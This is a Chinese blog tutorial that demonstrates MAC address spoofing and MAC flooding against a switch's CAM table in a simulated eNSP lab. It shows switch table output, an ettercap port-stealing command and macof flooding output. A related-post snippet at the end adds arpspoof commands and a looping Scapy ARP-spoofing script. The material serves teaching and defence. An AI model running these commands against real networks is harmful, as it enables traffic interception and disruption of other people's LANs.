MAC地址欺骗与MAC地址泛洪攻击(eNSP环境演示)

最新推荐文章于 2025-04-15 10:14:35 发布
最新推荐文章于 2025-04-15 10:14:35 发布
阅读量1.6w 收藏 98
点赞数 13
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/redwand/article/details/105388491
版权

MAC地址欺骗和MAC地址泛红攻击,是很古老的二层攻击手法,现在也很少用在网络攻击实战中,但对于其攻击原理却很值得学习,本文通过eNSP抓包的实践方式,充分学习了这两种攻击的手段,使我们对二层网络攻击有了更深刻的理解。

一、实验环境

eNSP拓扑环境
在这里插入图片描述

二、MAC地址欺骗

1、攻击原理:
MAC地址欺骗是数据链路层攻击,它是利用交换机端口学习的漏洞,通过客户端向交换机发送欺骗报文、攻击交换机的CAM表的方式,使交换机CAM表的记录与真实的主机对应MAC地址不一致,从而使交换机将报文错误转发给攻击者。
2、交换机的端口学习是如何进行的?又有何漏洞?我们实验先来了解一下。
(1)首先,我们在交换机LSW1上执行命令,清空交换机的CAM表,此时查看CAM表,内容为空。

[Huawei]undo mac-address all
[Huawei]display mac-address
[Huawei]

(2)我们从PC1上向PC2发一个构造的udp包,如图。
在这里插入图片描述
此时查看交换机的CAM表,发现已经学习了一条记录。

[Huawei]display mac-address
MAC address table of slot 0:
-------------------------------------------------------------------------------
MAC Address    VLAN/       PEVLAN CEVLAN Port            Type      LSP/LSR-ID  
               VSI/SI                                              MAC-Tunnel  
-------------------------------------------------------------------------------
5489-98dd-6106 1           -      -      Eth0/0/1        dynamic   0/-         
-------------------------------------------------------------------------------
Total matching items on slot 0 displayed = 1

我们再构造一个数据包,由PC1发给PC2,源MAC地址换成kali的MAC地址00-0c-29-6c-fc-6e。
在这里插入图片描述
再次查看交换机CAM表,发现交换机将kali的mac地址与Eht0/0/1绑定。

[Huawei]display mac-address
MAC address table of slot 0:
-------------------------------------------------------------------------------
MAC Address    VLAN/       PEVLAN CEVLAN Port            Type      LSP/LSR-ID  
               VSI/SI                                              MAC-Tunnel  
-------------------------------------------------------------------------------
000c-296c-fc6e 1           -      -      Eth0/0/1        dynamic   0/-         
5489-98dd-6106 1           -      -      Eth0/0/1        dynamic   0/-         
-------------------------------------------------------------------------------
Total matching items on slot 0 displayed = 2

由上,我们得到结论,交换机从某个端口收到一个数据包,它先读取包头中的源MAC地址,这样他就知道源MAC地址来自哪个端口,它会在CAM表中添加一条端口和MAC地址对应的记录。这种工作很高效,但如果交换机接收到了客户端伪造的源MAC地址的数据包,交换机同样也会将伪造的记录添加到CAM表中,作为信任的记录,这样就形成了MAC地址欺骗的漏洞。

【补充20200418】
上述的发包方式,虽然可以达到欺骗目的,但由于目的mac地址随机设置,交换机在接收到CAM表没有的MAC地址后,会以广播包的形式转发到网络中,这样网络中会产生大量的网络包,容易被受害者发现。因此,针对这种情况,可以将目标MAC地址设置为欺骗者本身的MAC地址,源MAC地址设置为受害者的MAC地址。同时,此过程可以使用工具ettercap实现,具体命令如下。

ettercap -T -q -M port:remote /192.168.253.164//

3、明白了交换机端口学习的原理,我们现在来伪造数据包,造成MAC地址欺骗,同时准备以下三个条件,如下图。
(1)在PC1上伪造源MAC为kali的MAC地址00-0c-29-6c-fc-6e,不停的发UDP包给PC2。
(2)在LSW1的Ehternet 0/0/1和Ethenet 0/0/3端口同时抓包。
(3)在PC2构造PC2到kali的数据包。
正常无欺骗的情况,LSW1的Ethenet 0/0/3端口可以抓到(3)过程的包。如果欺骗成功,则抓不到包,而是在LSW1的Ethenet 0/0/1端口上可以抓到该包。
在这里插入图片描述
构造的(1)过程中PC1周期发送如下图UDP报文
在这里插入图片描述
构造的(3)过程中PC2发给kali的数据包
在这里插入图片描述
LSW1的Ehternet 0/0/1抓包结果(点击下载
在这里插入图片描述
LSW1的Ehternet 0/0/3抓包结果
在这里插入图片描述
由此可见,原本由PC2发给kali的数据包,被PC1欺骗交换机后,交换机将报文转发给了PC1,这样PC1成功完成了MAC地址欺骗攻击。

三、MAC地址泛洪攻击

1、漏洞原理
每台交换机的CAM表都有最大记录条数,当交换机端口学习得到的记录大于交换机CAM表条数上限时,交换机收到一个网络帧,只要其目的站的MAC地址不存在于该交换机CAM表中,那么该帧会以广播的方式发向交换机的每一个端口,此时的交换机就相当于一个集线器HUB,我们就可以监听网络中的所有通讯报文。
2、攻击过程
以kali为攻击机,使用macof命令向网络中发送大量网络不存在的源mac地址,堵塞交换机的CAM表。

root@secwand:~#apt-get install dsniff	#安装macof
root@secwand:~# macof
de:f0:1b:1c:6f:8e ba:8d:41:6:3d:7a 0.0.0.0.25215 > 0.0.0.0.49125: S 475078686:475078686(0) win 512
ea:38:be:33:e5:aa 4d:ce:29:60:3c:2f 0.0.0.0.39934 > 0.0.0.0.238: S 1559529363:1559529363(0) win 512
b5:ea:9a:4:2d:1c 3:33:5f:73:fa:d2 0.0.0.0.58068 > 0.0.0.0.18986: S 697518561:697518561(0) win 512
31:1f:6c:72:6f:80 7c:a8:df:55:99:25 0.0.0.0.29320 > 0.0.0.0.56619: S 444895901:444895901(0) win 512
2:47:e7:37:ca:19 a9:73:33:66:61:2d 0.0.0.0.54528 > 0.0.0.0.25861: S 993143653:993143653(0) win 512
3b:75:bd:54:e7:55 4d:d1:68:4:5a:f0 0.0.0.0.28814 > 0.0.0.0.35766: S 1430997091:1430997091(0) win 512
e7:81:bb:79:4b:af df:ed:92:76:fe:79 0.0.0.0.59194 > 0.0.0.0.18284: S 1586191808:1586191808(0) win 512
9b:28:c8:4d:35:bb 4c:d2:d9:5b:3f:d0 0.0.0.0.46568 > 0.0.0.0.15767: S 1249153469:1249153469(0) win 512
13:6:d:71:2a:26 5f:82:7:70:d6:4c 0.0.0.0.41050 > 0.0.0.0.34579: S 1375163656:1375163656(0) win 512
94:cb:82:1f:a2:22 2e:4:26:69:88:cf 0.0.0.0.44712 > 0.0.0.0.33754: S 1652107051:1652107051(0) win 512
3f:7c:f7:1b:7:80 13:53:17:53:5c:c6 0.0.0.0.48520 > 0.0.0.0.34351: S 585705839:585705839(0) win 512

3、此时在交换机查看CAM表,发现表中大量陌生MAC地址记录,同时根据端口绑定可以看到绑定来自Ethernet0/0/3,说明这个攻击来自这接口。

[Huawei]display mac-address
MAC address table of slot 0:
-------------------------------------------------------------------------------
MAC Address    VLAN/       PEVLAN CEVLAN Port            Type      LSP/LSR-ID  
               VSI/SI                                              MAC-Tunnel  
-------------------------------------------------------------------------------
0050-56c0-0008 1           -      -      Eth0/0/3        dynamic   0/-         
0050-56eb-c57d 1           -      -      Eth0/0/3        dynamic   0/-         
5489-985d-0598 1           -      -      Eth0/0/2        dynamic   0/-         
5489-98dd-6106 1           -      -      Eth0/0/1        dynamic   0/-         
0050-56ef-dc6d 1           -      -      Eth0/0/3        dynamic   0/-         
000c-296c-fc6e 1           -      -      Eth0/0/3        dynamic   0/-         
feef-5464-ecad 1           -      -      Eth0/0/3        dynamic   0/-         
eaaa-9473-1926 1           -      -      Eth0/0/3        dynamic   0/-         
22a6-7027-c5f4 1           -      -      Eth0/0/3        dynamic   0/-         
7019-0f73-c876 1           -      -      Eth0/0/3        dynamic   0/-         
2eef-313b-f53f 1           -      -      Eth0/0/3        dynamic   0/-         
5682-5743-45c8 1           -      -      Eth0/0/3        dynamic   0/-         
7670-c168-505e 1           -      -      Eth0/0/3        dynamic   0/-         
8aaa-ba4f-489d 1           -      -      Eth0/0/3        dynamic   0/-         
a6a8-2d2a-73a7 1           -      -      Eth0/0/3        dynamic   0/-         
120c-2355-b4b5 1           -      -      Eth0/0/3        dynamic   0/-         
5833-be1f-0aa6 1           -      -      Eth0/0/3        dynamic   0/-         
f438-0117-c0dc 1           -      -      Eth0/0/3        dynamic   0/-         
dee0-7b40-1207 1           -      -      Eth0/0/3        dynamic   0/-         
4af0-244c-25d9 1           -      -      Eth0/0/3        dynamic   0/-         
f4d0-e92b-4fd5 1           -      -      Eth0/0/3        dynamic   0/-         
2859-7003-3924 1           -      -      Eth0/0/3        dynamic   0/-         
86ea-0825-52a2 1           -      -      Eth0/0/3        dynamic   0/-         
a4fd-c13a-8c3c 1           -      -      Eth0/0/3        dynamic   0/-         
  ---- More ----

4、实际网络攻击中,已经很少使用MAC地址泛洪攻击,当这种攻击的原理仍然值得我们学习。

DHCP饥饿攻击解释及实验(MAC泛洪攻击、DHCP DoS攻击)
墨痕诉清风的博客
07-11 1538
在弹出的窗口中填写攻击参数,服务器地址为Kali的IP地址,Start IP和End IP写为非VMnet1中的IP地址,其他参数随意写,此时我们便对windows 10主机分配了一个虚假的ip, 使得其无法正常联网。攻击原理:攻击者通过伪造MAC地址持续大量地向DHCP服务器申请IP地址,直到耗尽DHCP服务器地址池的IP地址,使DHCP服务器无法再给正常的主机分配IP地址,使得正常主机不能访问网络。:转发代理(网关)IP 地址,DHCP 客户端发出请求报文后经过的第一个 DHCP 中继的 IP 地址
数据链路层——MAC地址欺骗及泛洪
qq_49893586的博客
08-16 4302
本文讲述了在数据链路层的MAC地址欺骗泛洪攻击的原理和实验
MAC地址泛洪——华为ensp
qq_62987084的博客
07-23 734
MAC地址泛洪 实验
从 0 起步精通 ARP 攻防:协议解析、欺骗防范实战指南
最新发布
Cairo_A的博客
04-15 774
MAC地址是固化在网卡上的网络标识,由Ieee802标准规定。向同一个网段内的设备,发送数据包,广播IP地址是同网段最后一个IP地址
mac地址泛洪攻击详解
10-21
详解mac地址泛洪攻击。。。。 对大家深入理解交换网络安全有很大帮助
MAC地址欺骗攻击实验
qq_45329460的博客
03-29 3972
如图,终端A和终端B、C之间通信,会在交换机的各个端口建立转发表,当终端B向终端A发送一个数据帧时,终端A会返回终端B一个响应数据(ICMP)。如下图: 当把终端A的MAC地址作为终端C的MAC时,继续向终端A发送数据帧时,终端B就会把数据从通往终端C的接口转发出去: 可以发现,虽然终端B还向终端A发送数据帧,但是因为终端C的MAC地址为终端A的,则终端B就会把数据帧往错误的发现发送,这就是MAC欺骗的攻击实验。 ...
MAC地址欺骗
计算机系秃头少女的博客
03-19 2146
MAC地址欺骗原理 如图所示,两个用户PcA和PcB分别连接Cisco2912的portA和portB两个端口。 PortC 00.00.CC.CC.CC.CC Internet ...
Linux_Mac欺骗
ALL TECHNOLOGIES ARE CLOUDS
04-03 186
via: http://xmodulo.com/2014/02/spoof-mac-address-network-interface-linux.html   为什么要玩 MAC 地址欺骗? 想要理由?这里就给几个比较有技术含量的理由。 一些网络供应商会通过绑定你家路由器上的 MAC 地址来验证你的身份,这个时候如果你的路由器坏了,你怎么办?你可以暂时把你的电脑的 MAC 地址改成你家...
每日一练 - MAC 地址欺骗攻击
hcie-0001
08-15 661
MAC 地址欺骗攻击是指攻击者通过发送伪造的源 MAC 地址数据帧给交换机,使得交换机学习到错误的 MAC 地址表项。MAC 地址欺骗攻击主要是针对 MAC 地址表的学习机制,而不是直接影响 MAC 地址 IP 地址的映射关系。MAC 地址欺骗攻击主要是针对 MAC 地址表的学习机制,而不是直接影响 MAC 地址 IP 地址的映射关系。总之,选项 C 描述的是一个不正确的观点,即 MAC 地址欺骗攻击造成交换机学习到错误的 MAC 地址 IP 地址的映射关系。又或是需要完整华为真题真题题库?
MAC地址泛洪攻击以及防御措施
vbknnc的博客
01-24 2186
在kail中打开wireshark,选择eth0端口开始抓包,同时在ensp中client1不断进行登录登出,在wireshark中我们就可以抓到ftp的包,选择一个数据包,打开tcp追踪流,就可以看到用户名和密码了,至此攻击完成。由于交换机的帧交换表的大小是有限的,我们采用对交换机发送大量的IP-MAC的信息去占满交换机的帧交换表,这样在两台主机通信时信息就会溢出来,从而可以被监听到内容。cloud是用来模拟攻击方的,我们采用kail作为攻击方,因此在网卡方面选择和kali一样的VM8虚拟网卡。
ensp加kali实现arp欺骗攻击
04-21
在网络安全领域,ARP欺骗是一种常见的攻击手段,它利用了局域网中地址解析协议(ARP)的缺陷。本文将深入探讨如何使用Kali Linux这一专业安全操作系统,配合ENSPI(Ethernet Network Simulation Platform,以太网...
MAC地址泛洪攻击,监听用户名和密码。
qq_43623470的博客
01-15 1484
1,使用的工具使用模拟器ensp,虚拟机vm,VirtualBox。 2,新建拓扑图如下: 交换机使用华为s3700 云配置如下: 绑定网卡是virualbox的虚拟网卡,并加上udp端口,下面的端口映射,出端口选择2,并点上双向通道,形成映射。其他两个云类似。用真实网卡做实验会影响自己的真实网络,并且在抓包的时候数据过多,不容易观察。 3,vm虚拟机里的设置 需要安装xp,kali系统,具...
MAC地址欺骗MAC Address Spoofing)
qq_40844444的博客
11-22 2157
请注意,以上代码仅为示例,实际使用时需要根据具体的操作系统和网络环境进行调整。通常,网络交换机和路由器使用MAC地址来建立和更新其MAC地址表,从而正确地转发数据包。通过改变MAC地址,攻击者可以欺骗网络设备,使其认为数据来自另一个设备。MAC地址欺骗是一种网络攻击技术,攻击者通过改变网络设备的媒体访问控制(MAC地址来伪装成另一个设备或隐藏其真实身份。以下是C语言代码示例,用于在Linux系统上实现MAC地址欺骗。持久MAC地址欺骗通常涉及修改系统配置文件,以下是一个示例,它将MAC地址更改保存在。
MAC泛洪/MAC地址欺骗攻击原理介绍操作
辉小鱼的博客
07-09 824
Client Telnet New-Client测试。Kali使用Wireshark抓包。Kali开始进行MAC泛洪攻击。查看交换机MAC地址表状态。各类交换机CAM表容量。
Linux 上的 MAC 地址欺骗
真理部
04-04 1595
网卡生产商在每一张网卡(NIC)在出厂时都会在上面刻上一个48位的全球唯一标识符(GUID,例如08:4f:b5:05:56:a0),这串 GUID 就是网卡的 MAC 地址,用于确定一张网卡的身份。MAC 地址的高24位叫 OUI(Organizationally Unique Identifier 组织唯一标示符),是为网卡设置 MAC 地址的组织的标识符,这样一来,不同组织设置的 MAC
MAC地址欺骗实验
2302_77669548的博客
10-24 973
MAC地址欺骗
MAC--泛洪&欺骗
金灰的博客
08-21 1130
免责声明:本文仅做分享...
MAC地址泛洪欺骗模拟
qq_43698421的博客
09-21 1195
1 理论 1.1 原理 MAC地址欺骗是数据链路层攻击,它是利用交换机端口学习的漏洞,通过客户端向交换机发送欺骗报文、攻击交换机的CAM表的方式,使交换机CAM表的记录真实的主机对应MAC地址不一致,从而使交换机将报文错误转发给攻击者。 MAC地址泛洪攻击,每台交换机的CAM表都有最大记录条数,当交换机端口学习得到的记录大于交换机CAM表条数上限时,交换机收到一个网络帧,只要其目标主机的MAC地址不存在于该交换机CAM表中,那么该帧会以广播的方式发向交换机的每一个端口,此时的交换机就相当于一个集线器HUB
MAC地址欺骗攻击原理解释及举例说明
weixin_62697873的博客
11-21 793
例如,终端B向A发送数据帧,通过S1交换机,查其MAC地址表,会发现MAC A的转发端口为3(受到攻击前为1),随后由端口3通过S2交换机,查其MAC地址表,会发现MAC A的转发端口为2(受到攻击前为1),最后,由端口2通过S3交换机,查其MAC地址表,会发现MAC A的转发端口为23(受到攻击前为2)。然后,伪造MAC地址,黑客将自己的MAC地址修改为目标终端A的MAC地址MAC A,这样黑客终端A就能欺骗交换机S3认为它的MAC地址就是目标终端A的MAC地址
arp欺骗ensp
03-19
### ARP欺骗ENSP平台上的模拟防御 #### 一、ARP欺骗原理概述 地址解析协议(ARP, Address Resolution Protocol)用于将IP地址映射到MAC地址。然而,在局域网环境中,恶意设备可以通过伪造ARP响应来误导其他主机的信任关系,从而实现中间人攻击或其他网络威胁[^1]。 #### 二、ENSP上ARP欺骗的模拟过程 为了演示ARP欺骗的过程及其影响,可以在华为ENSP仿真软件中构建如下拓扑结构: - **路由器**:作为默认网关。 - **PC机A**:充当客户端。 - **PC机B**:充当服务器端。 - **Kali Linux虚拟机**:用作攻击者节点。 ##### 配置步骤说明 1. 开启流量转发功能以便于数据包能够通过攻击者的机器传输至目标双方之间。 2. 使用`arpspoof`命令分别向客户端和服务端发送虚假的ARP回复消息: ```bash arpspoof -i eth0 -t 192.168.11.10 192.168.11.20 arpspoof -i eth0 -t 192.168.11.20 192.168.11.10 ``` 这里需要注意的是第二个命令中的子网掩码部分可能存在笔误应改为`.11.`而非`.169.`以匹配同一子网内的通信需求。 3. 启动Wireshark工具捕获并分析经过攻击者系统的网络流量,验证是否存在未加密敏感信息泄露情况。 #### 三、针对ARP欺骗的安全防护措施 鉴于上述实验揭示的风险隐患,现列举几种有效的防范策略供参考实施: 1. **静态绑定ARP表项** 在受信任的关键设备上手动设置固定的IP-MAC对应条目,防止动态更新带来的不确定性风险。 2. **启用DHCP Snooping技术** 此机制允许交换机能区分合法非法的DHCP请求/回应报文,并阻止来自不可信源的数据流入内部网络区域。 3. **部署防毒墙或入侵检测系统(IDS)** 利用专业的网络安全产品实时监控异常活动迹象,一旦监测到可疑行为立即告警甚至阻断连接尝试。 4. **采用安全隧道协议(SSL/TLS)** 对于需保护的重要业务交互操作建议全程运用高强度加密手段保障信息安全传递不受窃听篡改危害。 ```python # 示例Python脚本片段展示如何利用Scapy库生成自定义ARP帧进行测试学习用途仅限授权环境下开展 from scapy.all import * def send_arp_spoof(target_ip, host_ip, interface="eth0"): packet = ARP(op=2, pdst=target_ip, hwdst=getmacbyip(target_ip), psrc=host_ip) send(packet, iface=interface) if __name__ == "__main__": target_a = "192.168.11.10" gateway_b = "192.168.11.20" try: while True: send_arp_spoof(target_a, gateway_b) time.sleep(1) except KeyboardInterrupt: pass ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值